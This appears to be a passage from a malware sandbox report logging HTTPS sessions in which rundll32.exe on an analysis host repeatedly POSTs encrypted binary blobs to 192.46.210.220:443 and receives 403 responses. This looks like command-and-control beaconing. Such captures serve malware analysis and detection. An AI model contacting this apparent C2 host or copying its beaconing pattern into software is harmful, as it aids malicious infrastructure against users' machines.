                                                                                                        2021-10-28 03:05:14 UTC207OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:15 UTC212INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:15 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        43192.168.2.349965192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:15 UTC212OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:15 UTC212OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:16 UTC217INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:16 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        44192.168.2.349971192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:18 UTC217OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:18 UTC217OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:19 UTC222INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:18 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        45192.168.2.349973192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:19 UTC222OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:19 UTC222OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:20 UTC227INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:19 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        46192.168.2.349979192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:22 UTC227OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:22 UTC227OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:22 UTC232INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:22 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        47192.168.2.349981192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:23 UTC232OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:23 UTC232OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:23 UTC237INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:23 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        48192.168.2.349987192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:25 UTC237OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:25 UTC237OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:26 UTC242INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:26 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        49192.168.2.349989192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:27 UTC242OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:27 UTC242OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:27 UTC246INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:27 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        5192.168.2.349764192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:03:57 UTC24OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:03:57 UTC24OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:03:57 UTC29INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:03:57 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        50192.168.2.349995192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:29 UTC247OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:29 UTC247OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:30 UTC251INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:30 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        51192.168.2.349997192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:31 UTC252OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:31 UTC252OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:31 UTC256INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:31 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        52192.168.2.350003192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:34 UTC257OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:34 UTC257OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:35 UTC261INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:35 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        53192.168.2.350005192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:35 UTC261OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:35 UTC262OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:36 UTC266INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:36 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        54192.168.2.350011192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:38 UTC266OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
